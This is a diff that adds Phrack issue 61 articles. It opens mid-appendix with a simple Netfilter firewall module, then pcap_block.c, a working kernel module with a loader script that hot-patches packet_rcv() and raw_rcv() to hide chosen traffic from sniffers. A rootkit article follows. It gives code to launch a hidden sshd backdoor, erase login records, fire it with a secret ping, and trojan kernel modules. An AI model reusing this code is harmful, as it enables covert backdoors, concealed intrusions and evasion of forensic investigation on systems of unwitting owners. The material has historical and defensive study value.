+struct nf_hook_ops nfkiller;
+
+/* Module statistics structure */
+static struct lwfw_stats lwfw_statistics = {0, 0, 0, 0, 0};
+
+/* Actual rule 'definitions'. */
+/* TODO:  One day LWFW might actually support many simultaneous rules.
+ * Just as soon as I figure out the list_head mechanism... */
+static char *deny_if = NULL;                 /* Interface to deny */
+static unsigned int deny_ip = 0x00000000;    /* IP address to deny */
+static unsigned short deny_port = 0x0000;   /* TCP port to deny */
+
+/* 
+ * This is the interface device's file_operations structure
+ */
+struct file_operations  lwfw_fops = {
+   NULL,
+     NULL,
+     NULL,
+     NULL,
+     NULL,
+     NULL,
+     lwfw_ioctl,
+     NULL,
+     lwfw_open,
+     NULL,
+     lwfw_release,
+     NULL			       /* Will be NULL'ed from here... */
+};
+
+MODULE_AUTHOR("bioforge");
+MODULE_DESCRIPTION("Light-Weight Firewall for Linux 2.4");
+
+/*
+ * This is the function that will be called by the hook
+ */
+unsigned int lwfw_hookfn(unsigned int hooknum,
+		       struct sk_buff **skb,
+		       const struct net_device *in,
+		       const struct net_device *out,
+		       int (*okfn)(struct sk_buff *))
+{
+   unsigned int ret = NF_ACCEPT;
+   
+   /* If LWFW is not currently active, immediately return ACCEPT */
+   if (!active)
+     return NF_ACCEPT;
+   
+   lwfw_statistics.total_seen++;
+   
+   /* Check the interface rule first */
+   if (deny_if && DENY_IF_ACTIVE) {
+      if (strcmp(in->name, deny_if) == 0) {   /* Deny this interface */
+	 lwfw_statistics.if_dropped++;
+	 lwfw_statistics.total_dropped++;
+	 return NF_DROP;
+      }
+   }
+   
+   /* Check the IP address rule */
+   if (deny_ip && DENY_IP_ACTIVE) {
+      ret = check_ip_packet(*skb);
+      if (ret != NF_ACCEPT) return ret;
+   }
+   
+   /* Finally, check the TCP port rule */
+   if (deny_port && DENY_PORT_ACTIVE) {
+      ret = check_tcp_packet(*skb);
+      if (ret != NF_ACCEPT) return ret;
+   }
+   
+   return NF_ACCEPT;		       /* We are happy to keep the packet */
+}
+
+/* Function to copy the LWFW statistics to a userspace buffer */
+static int copy_stats(struct lwfw_stats *statbuff)
+{
+   NULL_CHECK(statbuff);
+
+   copy_to_user(statbuff, &lwfw_statistics,
+		sizeof(struct lwfw_stats));
+   
+   return 0;
+}
+
+/* Function that compares a received TCP packet's destination port
+ * with the port specified in the Port Deny Rule. If a processing
+ * error occurs, NF_ACCEPT will be returned so that the packet is
+ * not lost. */
+static int check_tcp_packet(struct sk_buff *skb)
+{
+   /* Seperately defined pointers to header structures are used
+    * to access the TCP fields because it seems that the so-called
+    * transport header from skb is the same as its network header TCP packets.
+    * If you don't believe me then print the addresses of skb->nh.iph
+    * and skb->h.th. 
+    * It would have been nicer if the network header only was IP and
+    * the transport header was TCP but what can you do? */
+   struct tcphdr *thead;
+   
+   /* We don't want any NULL pointers in the chain to the TCP header. */
+   if (!skb ) return NF_ACCEPT;
+   if (!(skb->nh.iph)) return NF_ACCEPT;
+
+   /* Be sure this is a TCP packet first */
+   if (skb->nh.iph->protocol != IPPROTO_TCP) {
+      return NF_ACCEPT;
+   }
+
+   thead = (struct tcphdr *)(skb->data + (skb->nh.iph->ihl * 4));
+   
+   /* Now check the destination port */
+   if ((thead->dest) == deny_port) {
+      /* Update statistics */
+      lwfw_statistics.total_dropped++;
+      lwfw_statistics.tcp_dropped++;
+      
+      return NF_DROP;
+   }
+   
+   return NF_ACCEPT;
+}
+
+/* Function that compares a received IPv4 packet's source address
+ * with the address specified in the IP Deny Rule. If a processing
+ * error occurs, NF_ACCEPT will be returned so that the packet is
+ * not lost. */
+static int check_ip_packet(struct sk_buff *skb)
+{
+   /* We don't want any NULL pointers in the chain to the IP header. */
+   if (!skb ) return NF_ACCEPT;
+   if (!(skb->nh.iph)) return NF_ACCEPT;
+   
+   if (skb->nh.iph->saddr == deny_ip) {/* Matches the address. Barf. */
+      lwfw_statistics.ip_dropped++;    /* Update the statistics */
+      lwfw_statistics.total_dropped++;
+      
+      return NF_DROP;
+   }
+   
+   return NF_ACCEPT;
+}
+
+static int set_if_rule(char *name)
+{
+   int ret = 0;
+   char *if_dup;		       /* Duplicate interface */
+   
+   /* Make sure the name is non-null */
+   NULL_CHECK(name);
+   
+   /* Free any previously saved interface name */
+   if (deny_if) {
+      kfree(deny_if);
+      deny_if = NULL;
+   }
+   
+   if ((if_dup = kmalloc(strlen((char *)name) + 1, GFP_KERNEL))
+        == NULL) {
+      ret = -ENOMEM;
+   } else {
+      memset(if_dup, 0x00, strlen((char *)name) + 1);
+      memcpy(if_dup, (char *)name, strlen((char *)name));
+   }
+
+   deny_if = if_dup;
+   lwfw_statistics.if_dropped = 0;     /* Reset drop count for IF rule */
+   printk("LWFW: Set to deny from interface: %s\n", deny_if);
+   
+   return ret;
+}
+
+static int set_ip_rule(unsigned int ip)
+{
+   deny_ip = ip;
+   lwfw_statistics.ip_dropped = 0;     /* Reset drop count for IP rule */
+   
+   printk("LWFW: Set to deny from IP address: %d.%d.%d.%d\n",
+	  ip & 0x000000FF, (ip & 0x0000FF00) >> 8,
+	  (ip & 0x00FF0000) >> 16, (ip & 0xFF000000) >> 24);
+   
+   return 0;
+}
+
+static int set_port_rule(unsigned short port)
+{
+   deny_port = port;
+   lwfw_statistics.tcp_dropped = 0;    /* Reset drop count for TCP rule */
+   
+   printk("LWFW: Set to deny for TCP port: %d\n",
+	  ((port & 0xFF00) >> 8 | (port & 0x00FF) << 8));
+	  
+   return 0;
+}
+
+/*********************************************/
+/* 
+ * File operations functions for control device
+ */
+static int lwfw_ioctl(struct inode *inode, struct file *file,
+		      unsigned int cmd, unsigned long arg)
+{
+   int ret = 0;
+   
+   switch (cmd) {
+    case LWFW_GET_VERS:
+      return LWFW_VERS;
+    case LWFW_ACTIVATE: {
+       active = 1;
+       printk("LWFW: Activated.\n");
+       if (!deny_if && !deny_ip && !deny_port) {
+	  printk("LWFW: No deny options set.\n");
+       }
+       break;
+    }
+    case LWFW_DEACTIVATE: {
+       active ^= active;
+       printk("LWFW: Deactivated.\n");
+       break;
+    }
+    case LWFW_GET_STATS: {
+       ret = copy_stats((struct lwfw_stats *)arg);
+       break;
+    }
+    case LWFW_DENY_IF: {
+       ret = set_if_rule((char *)arg);
+       break;
+    }
+    case LWFW_DENY_IP: {
+       ret = set_ip_rule((unsigned int)arg);
+       break;
+    }
+    case LWFW_DENY_PORT: {
+       ret = set_port_rule((unsigned short)arg);
+       break;
+    }
+    default:
+      ret = -EBADRQC;
+   };
+   
+   return ret;
+}
+
+/* Called whenever open() is called on the device file */
+static int lwfw_open(struct inode *inode, struct file *file)
+{
+   if (lwfw_ctrl_in_use) {
+      return -EBUSY;
+   } else {
+      MOD_INC_USE_COUNT;
+      lwfw_ctrl_in_use++;
+      return 0;
+   }
+   return 0;
+}
+
+/* Called whenever close() is called on the device file */
+static int lwfw_release(struct inode *inode, struct file *file)
+{
+   lwfw_ctrl_in_use ^= lwfw_ctrl_in_use;
+   MOD_DEC_USE_COUNT;
+   return 0;
+}
+
+/*********************************************/
+/*
+ * Module initialisation and cleanup follow...
+ */
+int init_module()
+{
+   /* Register the control device, /dev/lwfw */
+      SET_MODULE_OWNER(&lwfw_fops);
+   
+   /* Attempt to register the LWFW control device */
+   if ((major = register_chrdev(LWFW_MAJOR, LWFW_NAME,
+				&lwfw_fops)) < 0) {
+      printk("LWFW: Failed registering control device!\n");
+      printk("LWFW: Module installation aborted.\n");
+      return major;
+   }
+   
+   /* Make sure the usage marker for the control device is cleared */
+   lwfw_ctrl_in_use ^= lwfw_ctrl_in_use;
+
+   printk("\nLWFW: Control device successfully registered.\n");
+   
+   /* Now register the network hooks */
+   nfkiller.hook = lwfw_hookfn;
+   nfkiller.hooknum = NF_IP_PRE_ROUTING;   /* First stage hook */
+   nfkiller.pf = PF_INET;	           /* IPV4 protocol hook */
+   nfkiller.priority = NF_IP_PRI_FIRST;    /* Hook to come first */
+   
+   /* And register... */
+   nf_register_hook(&nfkiller);
+   
+   printk("LWFW: Network hooks successfully installed.\n");
+   
+   printk("LWFW: Module installation successful.\n");
+   return 0;
+}
+
+void cleanup_module()
+{
+   int ret;
+   
+   /* Remove IPV4 hook */
+   nf_unregister_hook(&nfkiller);
+
+   /* Now unregister control device */
+   if ((ret = unregister_chrdev(LWFW_MAJOR, LWFW_NAME)) != 0) {
+      printk("LWFW: Removal of module failed!\n");
+   }
+
+   /* If anything was allocated for the deny rules, free it here */
+   if (deny_if)
+     kfree(deny_if);
+   
+   printk("LWFW: Removal of module successful.\n");
+}
+<-->
+
+<++> lwfw/lwfw.h
+/* Include file for the Light-weight Fire Wall LKM.
+ * 
+ * A very simple Netfilter module that drops backets based on either
+ * their incoming interface or source IP address.
+ * 
+ * Written by bioforge  -  March 2003
+ */
+
+#ifndef __LWFW_INCLUDE__
+# define __LWFW_INCLUDE__
+
+/* NOTE: The LWFW_MAJOR symbol is only made available for kernel code.
+ * Userspace code has no business knowing about it. */
+# define LWFW_NAME        "lwfw" 
+
+/* Version of LWFW */
+# define LWFW_VERS        0x0001       /* 0.1 */
+
+/* Definition of the LWFW_TALKATIVE symbol controls whether LWFW will
+ * print anything with printk(). This is included for debugging purposes.
+ */
+#define LWFW_TALKATIVE
+
+/* These are the IOCTL codes used for the control device */
+#define LWFW_CTRL_SET   0xFEED0000     /* The 0xFEED... prefix is arbitrary */
+#define LWFW_GET_VERS   0xFEED0001     /* Get the version of LWFM */
+#define LWFW_ACTIVATE   0xFEED0002
+#define LWFW_DEACTIVATE 0xFEED0003
+#define LWFW_GET_STATS  0xFEED0004
+#define LWFW_DENY_IF    0xFEED0005
+#define LWFW_DENY_IP    0xFEED0006
+#define LWFW_DENY_PORT  0xFEED0007
+
+/* Control flags/Options */
+#define LWFW_IF_DENY_ACTIVE   0x00000001
+#define LWFW_IP_DENY_ACTIVE   0x00000002
+#define LWFW_PORT_DENY_ACTIVE 0x00000004
+
+/* Statistics structure for LWFW.
+ * Note that whenever a rule's condition is changed the related
+ * xxx_dropped field is reset.
+ */
+struct lwfw_stats {
+   unsigned int if_dropped;	       /* Packets dropped by interface rule */
+   unsigned int ip_dropped;	       /* Packets dropped by IP addr. rule */
+   unsigned int tcp_dropped;	       /* Packets dropped by TCP port rule */
+   unsigned long total_dropped;   /* Total packets dropped */
+   unsigned long total_seen;      /* Total packets seen by filter */
+};
+
+/* 
+ * From here on is used solely for the actual kernel module
+ */
+#ifdef __KERNEL__
+# define LWFW_MAJOR       241   /* This exists in the experimental range */
+
+/* This macro is used to prevent dereferencing of NULL pointers. If
+ * a pointer argument is NULL, this will return -EINVAL */
+#define NULL_CHECK(ptr)    \
+   if ((ptr) == NULL)  return -EINVAL
+
+/* Macros for accessing options */
+#define DENY_IF_ACTIVE    (lwfw_options & LWFW_IF_DENY_ACTIVE)
+#define DENY_IP_ACTIVE    (lwfw_options & LWFW_IP_DENY_ACTIVE)
+#define DENY_PORT_ACTIVE  (lwfw_options & LWFW_PORT_DENY_ACTIVE)
+
+#endif				       /* __KERNEL__ */
+#endif
+<-->
+
+<++> lwfw/Makefile
+CC= egcs
+CFLAGS= -Wall -O2
+OBJS= lwfw.o
+
+.c.o:
+	$(CC) -c $< -o $@ $(CFLAGS)
+
+all: $(OBJS)
+
+clean:
+	rm -rf *.o
+	rm -rf ./*~
+<-->
+
+
+--[ B - Code for section 6
+
+   Presented  here is  a  simple  module that will  hijack the
+ packet_rcv() and raw_rcv() functions to hide  any packets  to
+ or from the  IP address  we specify.  The default  IP address
+ is set to 127.0.0.1, but this  can be changed by changing the
+ value of  the  #define IP.  Also  presented is a  bash script
+ that will get the addresses for the required functions from a
+ System.map  file  and run  insmod  with  these  addresses  as
+ parameters in the required  format.  This loader  script  was
+ written by  grem.  Originally for  my Mod-off project, it was
+ easily  modified to suit  the module  presented here.  Thanks
+ again grem.
+ 
+   The presented module  is proof-of-concept  code only and as
+ such, does not have anything in the way of module  hiding. It
+ is also  important to  remember that although this module can
+ hide  traffic  from a  sniffer  running on the  same  host, a
+ sniffer on a different host, but on the same LAN segment will
+ still see  the packets. From what is presented in the module,
+ smart  readers  should have  everything  they need to  design
+ filtering functions to block any kind of packets they need. I
+ have successfully used the technique presented  in this  text
+ to hide control and information retrieval packets used by  my
+ other LKM projects.
+ 
+ 
+<++> pcaphide/pcap_block.c
+/* Kernel hack that will hijack the packet_rcv() function
+ * which is used to pass packets to  Libpcap applications
+ * that use  PACKET sockets.  Also  hijacks the raw_rcv()
+ * function. This is used to pass packets to applications
+ * that open RAW sockets.
+ * 
+ * Written by bioforge  -  30th June, 2003
+ */
+
+#define MODULE
+#define __KERNEL__
+
+#include <linux/config.h>
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/netdevice.h>
+#include <linux/skbuff.h>
+#include <linux/smp_lock.h>
+#include <linux/ip.h>		       /* For struct ip */
+#include <linux/if_ether.h>	       /* For ETH_P_IP */
+
+#include <asm/page.h>		       /* For PAGE_OFFSET */
+
+/* 
+ * IP address to hide 127.0.0.1 in NBO for Intel */
+#define IP    htonl(0x7F000001)
+
+/* Function pointer for original packet_rcv() */
+static int (*pr)(struct sk_buff *skb, struct net_device *dev,
+		  struct packet_type *pt);
+MODULE_PARM(pr, "i");       /* Retrieved as insmod parameter */
+
+/* Function pointer for original raw_rcv() */
+static int (*rr)(struct sock *sk, struct sk_buff *skb);
+MODULE_PARM(rr, "i");
+
+/* Spinlock used for the parts where we un/hijack packet_rcv() */
+static spinlock_t hijack_lock  = SPIN_LOCK_UNLOCKED;
+
+/* Helper macros for use with the Hijack spinlock */
+#define HIJACK_LOCK    spin_lock_irqsave(&hijack_lock, \
+					     sl_flags)
+#define HIJACK_UNLOCK  spin_unlock_irqrestore(&hijack_lock, \
+						  sl_flags)
+
+#define CODESIZE 10
+/* Original and hijack code buffers.
+ * Note that the hijack code also provides 3 additional
+ * bytes ( inc eax;  nop;  dec eax ) to try and throw
+ * simple hijack detection techniques that just look for
+ * a move and a jump. */
+/* For packet_rcv() */
+static unsigned char pr_code[CODESIZE] = "\xb8\x00\x00\x00\x00"
+                                      "\x40\x90\x48"
+                                      "\xff\xe0";
+static unsigned char pr_orig[CODESIZE];
+
+/* For raw_rcv() */
+static unsigned char rr_code[CODESIZE] = "\xb8\x00\x00\x00\x00"
+                                      "\x40\x90\x48"
+                                      "\xff\xe0";
+static unsigned char rr_orig[CODESIZE];
+
+/* Replacement for packet_rcv(). This is currently setup to hide
+ * all packets with a source or destination IP address that we
+ * specify. */
+int hacked_pr(struct sk_buff *skb, struct net_device *dev,
+	       struct packet_type *pt)
+{
+    int sl_flags;		       /* Flags for spinlock */
+    int retval;
+
+    /* Check if this is an IP packet going to or coming from our
+     * hidden IP address. */
+    if (skb->protocol == htons(ETH_P_IP))   /* IP packet */
+      if (skb->nh.iph->saddr == IP || skb->nh.iph->daddr == IP)
+	return 0;		    /* Ignore this packet */
+    
+    /* Call original */
+    HIJACK_LOCK;
+    memcpy((char *)pr, pr_orig, CODESIZE);
+    retval = pr(skb, dev, pt);
+    memcpy((char *)pr, pr_code, CODESIZE);
+    HIJACK_UNLOCK;
+
+    return retval;
+}
+
+/* Replacement for raw_rcv(). This is currently setup to hide
+ * all packets with a source or destination IP address that we
+ * specify. */
+int hacked_rr(struct sock *sock, struct sk_buff *skb)
+{
+    int sl_flags;		       /* Flags for spinlock */
+    int retval;
+
+    /* Check if this is an IP packet going to or coming from our
+     * hidden IP address. */
+    if (skb->protocol == htons(ETH_P_IP))   /* IP packet */
+      if (skb->nh.iph->saddr == IP || skb->nh.iph->daddr == IP)
+	return 0;		    /* Ignore this packet */
+    
+    /* Call original */
+    HIJACK_LOCK;
+    memcpy((char *)rr, rr_orig, CODESIZE);
+    retval = rr(sock, skb);
+    memcpy((char *)rr, rr_code, CODESIZE);
+    HIJACK_UNLOCK;
+
+    return retval;
+}
+
+int init_module()
+{
+    int sl_flags;		       /* Flags for spinlock */
+    
+    /* pr & rr set as module parameters. If zero or < PAGE_OFFSET
+     * (which we treat as the lower bound of kernel memory), then
+     * we will not install the hacks. */
+    if ((unsigned int)pr == 0 || (unsigned int)pr < PAGE_OFFSET) {
+	printk("Address for packet_rcv() not valid! (%08x)\n",
+	       (int)pr);
+	return -1;
+    }
+    if ((unsigned int)rr == 0 || (unsigned int)rr < PAGE_OFFSET) {
+	printk("Address for raw_rcv() not valid! (%08x)\n",
+	       (int)rr);
+	return -1;
+    }
+         
+    *(unsigned int *)(pr_code + 1) = (unsigned int)hacked_pr;
+    *(unsigned int *)(rr_code + 1) = (unsigned int)hacked_rr;
+    
+    HIJACK_LOCK;
+    memcpy(pr_orig, (char *)pr, CODESIZE);
+    memcpy((char *)pr, pr_code, CODESIZE);
+    memcpy(rr_orig, (char *)rr, CODESIZE);
+    memcpy((char *)rr, rr_code, CODESIZE);
+    HIJACK_UNLOCK;
+    
+    EXPORT_NO_SYMBOLS;
+    
+    return 0;
+}
+
+void cleanup_module()
+{
+    int sl_flags;
+    
+    lock_kernel();
+    
+    HIJACK_LOCK;
+    memcpy((char *)pr, pr_orig, CODESIZE);
+    memcpy((char *)rr, rr_orig, CODESIZE);
+    HIJACK_UNLOCK;
+    
+    unlock_kernel();
+}
+<-->
+
+<++> pcaphide/loader.sh
+#!/bin/sh
+#  Written by  grem, 30th June 2003
+#  Hacked by bioforge, 30th June 2003
+
+if [ "$1" = "" ]; then
+        echo "Use: $0 <System.map>";
+        exit;
+fi
+
+MAP="$1"
+PR=`cat $MAP | grep -w "packet_rcv" | cut -c 1-16`
+RR=`cat $MAP | grep -w "raw_rcv" | cut -c 1-16`
+
+if [ "$PR" = "" ]; then
+        PR="00000000"
+fi
+if [ "$RR" = "" ]; then
+        RR="00000000"
+fi
+
+echo "insmod pcap_block.o pr=0x$PR rr=0x$RR"
+
+# Now do the actual call to insmod
+insmod pcap_block.o pr=0x$PR rr=0x$RR
+<-->
+
+<++> pcaphide/Makefile
+CC= gcc
+CFLAGS= -Wall -O2 -fomit-frame-pointer
+INCLUDES= -I/usr/src/linux/include
+OBJS= pcap_block.o
+
+.c.o:
+	$(CC) -c $< -o $@ $(CFLAGS) $(INCLUDES)
+
+all: $(OBJS)
+
+clean:
+	rm -rf *.o
+	rm -rf ./*~
+<-->
+
+
+------[ References
+
+This appendix contains a list of references used in writing this article.
+
+ [1]  The tcpdump group
+      http://www.tcpdump.org
+ [2]  The Packet Factory
+      http://www.packetfactory.net
+ [3]  My network tools page -
+      http://uqconnect.net/~zzoklan/software/#net_tools
+ [4]  Silvio Cesare's Kernel Function Hijacking article
+      http://vx.netlux.org/lib/vsc08.html
+ [5]  Man pages for:
+    - raw (7)
+    - packet (7)
+    - tcpdump (1)
+ [6]  Linux kernel source files. In particular:
+    - net/packet/af_packet.c     (for  packet_rcv())
+    - net/ipv4/raw.c             (for  raw_rcv())
+    - net/core/dev.c
+    - net/ipv4/netfilter/*
+ [7] Harald Welte's Journey of a packet through the Linux 2.4 network
+     stack
+     http://gnumonks.org/ftp/pub/doc/packet-journey-2.4.html
+ [8] The Netfilter documentation page
+     http://www.netfilter.org/documentation
+ [9] Phrack 55 - File 12 -
+     http://www.phrack.org/show.php?p=55&a=12
+ [A] Linux Device Drivers 2nd Ed. by Alessandro Rubini et al.
+ [B] Inside the Linux Packet Filter. A Linux Journal article
+     http://www.linuxjournal.com/article.php?sid=4852
+
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack61/14.txt b/phrack61/14.txt
new file mode 100644
index 0000000..ef528a9
--- /dev/null
+++ b/phrack61/14.txt
@@ -0,0 +1,321 @@
+                           ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3d, Phile 0x0e of 0x0f
+
+|=-----------------------------------------------------------------------=|
+|=------------------=[ Kernel Rootkit Experiences ]=---------------------=|
+|=-----------------------------------------------------------------------=|
+|=----------------=[ stealth <stealth@segfault.net> ]=-------------------=|
+
+
+--[ Contents
+
+  1 - Introduction
+
+  2 - Sick of it all?
+
+  3 - Let it log
+
+  4 - Let it rock
+
+  5 - Thinking about linking
+
+  6 - as in 2.6
+
+  7 - Last words & References
+
+
+--[ 1 - Introduction
+
+This article focuses on kernel based rootkits and how much they will be
+influenced by "normal" backdoors in future. Kernel based rootkits
+are there for a while, and they will be there in future, so some ideas
+and outlooks seem worth.
+  Before reading this article, you should read the article regarding the
+netfilter hooks and the LKM relinking first. The backdoor impmentations I am
+speaking of and code snippets will utilize these.
+  Please do not take this article too serious, it is not a description
+of how to hack if you read between the lines. I just express what I
+have experianced as "adore author" during the last years. This ranges from
+upset admins at congresses, weird questions at speaches, mails which
+cry for help, "adore sucks" messages at IRC, congratulations from
+.edu sites and so on.
+
+
+--[ 2 - Sick of it all?
+
+Rootkits, and kernel based rootkits in particular, are available since a
+few years now, and some research has been done in this field. A lot of
+blubbering and even more blahs are published from time to time, and this is
+really annoying so I can understand if you do not read articles about rootkits
+anymore. Nevertheless, new obstacles come up and have to be addressed by
+rootkit (-authors) in the future. These include but are not limited to:
+
+  - new kernel-versions and vendor extensions
+  - absence of important symbols (namely sys_call_table)
+  - advanced logging and auditing mechanisms
+  - kernel hardening, trusted OS etc.
+  - intrusion detection/abnormal behaivior detection
+  - advanced forensic tools and analysis methods
+
+
+While some of these points I try to address in adore-ng like avoiding
+of sys_call_table[] usage via VFS layer redirection, some points are
+still topic of research. Rootkits usually include logfile cleaners
+for the [u,w]tmp files, but this bites with the "least privilege" principle
+rule for intruders, which turns into a "least uploads to the system"
+rule. So, one point is to try to avoid logging at all, at the
+backdoor level (LKM level in our case) to have less binaries on the
+target system.
+  The trusted OS thingie has to be addressed in a own paper, and I already
+know which kernel hardening I want to look at spender. :-)
+
+
+--[ 3 Let it log
+
+During a speach about rootkits at a certain university by a forensic
+company I got some nice ideas how one can improve invisibillity.
+  Today, advanced folks is probably dont patching the sshd binary anymore,
+but placing apropriate authentitation tokens at certain places
+(yes, distributed authentication mechanisms can be nasty for forensics).
+So, if the intruder is going to use the standard tools (he can also
+post-install uninstalled libraries and packages if they are missing; do you
+know which of the 3 admins installed the openssh package at pc-5073?)
+the lkm-rootkit has somehow to ensure the logs the sshd sends go to
+/dev/null. One can do it this way:
+
+
+  static int ssh(void *vp)
+  {
+          char *a[] = {"/usr/bin/perl", "-e",
+          "$ENV{PATH}='/usr/bin:/bin:/sbin:/usr/sbin';"
+          "open(STDIN,'</dev/null');open(STDOUT,'>/dev/null');"
+          "open(STDERR,'>/dev/null');"
+          "exec('sshd -e -d -p 2222');",
+               NULL};
+
+          task_lock(current);
+          REMOVE_LINKS(current);
+          list_del(&current->thread_group);
+          evil_sshd_pid = current->pid;
+          task_unlock(current);
+          exec_usermodehelper(*a, a, NULL);
+          return 0;
+
+  }
+
+
+This looks like it could be called as kernel_thread() by a netfilter hook eh?
+"-e" lets sshd log to stderr which is /dev/null in this case. Excellent.
+"-d" is a nice switch which forbids sshd to fork and therefore does
+not have open ports which can be detected after intruders login.
+REMOVE_LINK() makes the process invisible for ps and friends. Using perl
+is necessary to open stdin etc. because exec_usermodehelper() will close
+all files before starting sshd which makes sshd mix up stderr with the
+sockets when run with -e.
+  The utmp/wtmp/lastlog logging can be avoided via:
+
+        // parent must be evil sshd (since child which becomes the shell
+        // logs the stuff)
+        if (current->p_opptr &&
+            current->p_opptr->pid == evil_sshd_pid && evil_sshd_pid != 0) {
+                for (i = 0; var_filenames[i]; ++i) {
+                        if (var_files[i] && f->f_dentry->d_inode->i_ino ==
+                            var_files[i]->f_dentry->d_inode->i_ino) {
+                                task_unlock(current);
+                                *off += blen;
+                                return blen;
+                        }
+                }
+        }
+
+It looks whether the loggie is the sshd and whether it tries to
+write [u,w]tmp entries into the appropriate files. Ofcorse we have
+to redirect the write() function in the VFS layer and to check
+the inode numbers to filter out the correct writes. Indeed, we
+would have to check the superblock too, but sshd is not
+going to write to files with the same inode# on a different disk
+I think.
+  Some pam modules open a session when one logs in, so a
+
+  pam_unix2: session started for user root
+
+might appear in the logs even by the evil sshd with log redirection.
+So, as it seems, the log-issue can be solved in future backdoors/rootkits
+without messing too much with the system binaries.
+
+
+--[ 4 Let it rock
+
+One needs a trigger to start the evil sshd, so nmap does not show open
+ports. Ofcorse. The netfilter article shows how one can build his
+own icmp-hooks to do so. I wont describe it again here, the article
+does it better than I could. Just one important point: as far as
+I have experianced you cannot start a program from within the hook directly.
+Kernel will crash badly, probably because the hook is somehow nested
+in an interrupt service routine. To overcome this problem, we set a flag that
+the sshd should be started:
+
+        if (hit && (hit-1) % HIT_FREQ == 0) {
+                write_lock(&ssh_lock);
+                start_ssh = 1;
+                write_unlock(&ssh_lock);
+                return NF_DROP;
+        }
+
+and since we mess with the VFS layer anyway, we also redirect the
+open() call (of the particular FS which /etc holds) so the next
+process that is opening a file on the same FS is starting the evil sshd.
+That might be a "ls" by root or we trigger it ourself via the real
+sshd that is running:
+
+  root@linux:root# telnet 127.0.0.1 22
+  Trying 127.0.0.1...
+  Connected to 127.0.0.1.
+  Escape character is '^]'.
+  SSH-2.0-OpenSSH_3.5p1
+  SSH-2.0-OpenSSH_3.5p1              <<<<< pasted by attacker
+  Connection closed by foreign host.
+
+On my machine this causes logs from the real sshd:
+
+  sshd[1967]: fatal: No supported key exchange algorithms
+
+If one does not enter a valid protocol-string you get your IP logged:
+
+  sshd[1980]: Bad protocol version identification '' from ::ffff:127.0.0.1
+
+Might be there are other services (with zero logs) which open files and
+trigger the start of the evil sshd like a httpd.
+  Easy to see that it is possible for the kernel rootkit to
+supress certain log messages but by now it depends on the application
+and knowledge about when/what it will log. Not a too bad assumption
+for an intruder but in future intruders could use tainting-like mechanisms
+(taint every log-data that is caused by a hidden shell for example)
+to supress any logs the admin could find usefull for detecting the
+intruder.
+
+
+--[ 5 Thinking about linking
+
+There is an article regarding LKM infection, please read it, its
+worth to spend the time. :-)
+However, one does not need to mess with the ELF format too much, a simple
+mmap() with a substitution of the init_module() and cleanup_module()
+will suffice. Such a program has to be part of the rootkit, because 
+rootkits have to be user-friendly, so they can easily set up by
+admins who run honeypot systems:
+
+
+  root@linux:zero# ./configure 
+  Starting configuration ...
+  generating secret pattern ...
+  \\x37\\x8e\\x37\\x5f
+  checking 4 SMP ... NO
+  checking 4 MODVERSIONS ...NO
+
+
+  Your secret ping commandline is: ping -s 32 -p 378e375f IP
+
+  root@linux:zero# make
+  cc -c -I/usr/src/linux/include -DSECRET_PATTERN=\"\\x37\\x8e\\x37\\x5f\"\
+     -O2 -Wall zero.c
+  cc -c -I/usr/src/linux/include -DSECRET_PATTERN=\"\\x37\\x8e\\x37\\x5f\"\
+     -O2 -Wall -DSTANDALONE zero.c -o zero-alone.o
+  cc -c -I/usr/src/linux/include -DSECRET_PATTERN=\"\\x37\\x8e\\x37\\x5f\"\
+     -O2 -Wall cleaner.c
+  root@linux:zero# ./setup 
+  The following LKMs are available:
+
+
+  af_packet ppp_async ppp_generic slhc iptable_filter 
+  ip_tables ipv6 st sr_mod sg 
+  mousedev joydev evdev input uhci 
+  usbcore raw1394 ieee1394 8139too mii 
+  scsi cd cdrom parport_pc ppa 
+
+  Chose one: sg
+  Choice was >>>sg<<<
+  Searching for sg.o ...
+  Found /lib/modules/2.4.20/kernel/drivers/scsi/sg.o!
+
+  Copy trojaned LKM back to original LKM? (y/n)
+
+  ...
+
+zero.o is for relinkage with one of the chosen modules, but since
+this is already inserted into kernel, the intruder needs a standalone module:
+zero-alone.o.
+  For more ideas on linking and different platform approaches, please
+look at the particular article at [1].
+
+
+--[ 6 as in 2.6
+
+As of writing, the 2.6 Linux kernel is already in testing phase, and
+soon the first non-testing versions of it will be available. So, it
+is probably time to look at the new glitches. At [4] you find a
+version of adore-ng that already works with the Linux kernel 2.6.
+Beside some new headers the rootkit will need, the signatures
+of some functions we need to redirect changed. A not unusual thing. 
+Not too much challenging. In particular the init and cleanup
+functions have to be announced to the LKM loader in a different way:
+
+  #ifdef LINUX26
+  static int __init adore_init()
+  #else
+  int init_module()
+  #endif
+
+and
+
+  static void __exit adore_cleanup()
+  #else
+  int cleanup_module()
+  #endif
+
+
+   ...
+
+  #ifdef LINUX26
+  module_init(adore_init);
+  module_exit(adore_cleanup);
+  #endif
+
+No big thing either. Adore-ng already uses the new VFS technique
+to hide files and processes, so we do not need to care about sys_call_table
+layout.
+  The most time-consuming part of porting adore to the 2.6 kernel was
+to find out how the LKMs are build at all. Its not enough to "cc"
+them to a single object file anymore. You have to link it against
+some other object-file compiled from a C-file containing certain infos
+and attributes like a
+
+  MODULE_INFO(vermagic, VERMAGIC_STRING);
+
+for example. I do not know why they depend on this.
+  And thats all for 2.6! No magic at all, except some hooks introduced
+in the kernel seem worth a look. :-)
+
+
+--[ 7 Last words & references
+
+Zero rootkit does not hide files, and it only hides the evil sshd process
+by removing it from the task-list. It is not wise to "halt" the system from
+such a process or its child. I tested zero on a SMP system but it freezed.
+No matter whether it was me or the "-f" insmod switch I had to use because
+of the different versions. If anyone is willing to grant (legal ofcorse!)
+access to a SMP box, let the phrack team or me know. Zero is experimental
+stuff, so please do not tell me you do not like it because it is missing
+a GUI or stuff.
+
+Some links:
+
+  [1] Infecting Loadable Kernel Modules (in this release)
+  [2] Hacking da Linux Kernel Network Stack (in this release)
+  [3] http://stealth.7350.org/empty/zero.tgz
+      (soon appears at http://stealth.7350.org/rootkits)
+  [4] http://stealth.7350.org/rootkits/adore-ng-0.24.tgz
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack61/15.txt b/phrack61/15.txt
new file mode 100644
index 0000000..c9e72fb
--- /dev/null
+++ b/phrack61/15.txt
@@ -0,0 +1,958 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3d, Phile #0x0f of 0x0f
+
